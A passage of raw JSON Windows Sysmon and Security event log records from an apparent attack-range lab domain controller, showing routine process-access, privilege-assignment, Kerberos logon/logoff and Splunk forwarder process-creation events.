6be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5966,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:55.692\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:55.692","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5967,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:55.692\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:55.692","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5968,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:55.692\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:55.692","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5969,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:55.692\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:55.692","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5970,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:55.692\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:55.692","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5971,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:55.692\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-03AF-5F25-0000-001089000B00}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:55.692","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-03AF-5F25-0000-001089000B00}","TargetProcessId":"2856","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220683,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xB033F\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xb033f","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220684,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xB033F\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t54986\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xb033f","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"54986","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220685,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xB033F\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xb033f","LogonType":"3","EventReceivedTime":"2020-08-01 05:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5972,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.195\r\nProcessGuid: {A837DB8D-03E6-5F25-0000-0010E00C0B00}\r\nProcessId: 2476\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program 